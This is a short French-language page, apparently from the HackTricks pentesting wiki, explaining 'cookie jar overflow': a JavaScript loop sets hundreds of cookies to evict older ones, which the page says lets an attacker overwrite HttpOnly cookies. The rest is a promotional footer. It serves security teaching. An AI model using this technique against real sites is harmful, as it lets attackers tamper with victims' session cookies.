2.6 KiB
Les navigateurs ont une limite sur le nombre de cookies qu'ils peuvent stocker pour une page. Ainsi, si pour une raison quelconque vous devez faire disparaître un cookie, vous pouvez déborder le pot de cookies car les plus anciens seront supprimés en premier :
// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}
// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}
Notez que les cookies tiers pointant vers un domaine différent ne seront pas écrasés.
{% hint style="danger" %} Cette attaque peut également être utilisée pour écraser les cookies HttpOnly car vous pouvez le supprimer puis le réinitialiser avec la valeur que vous voulez.
Vérifiez cela dans cet article avec un laboratoire. {% endhint %}
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les PLANS D'ABONNEMENT !
-
Découvrez The PEASS Family, notre collection exclusive de NFTs
-
Obtenez le swag officiel PEASS & HackTricks
-
Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez moi sur Twitter 🐦@carlospolopm.
-
Partagez vos astuces de piratage en soumettant des PR au repo hacktricks et au repo hacktricks-cloud.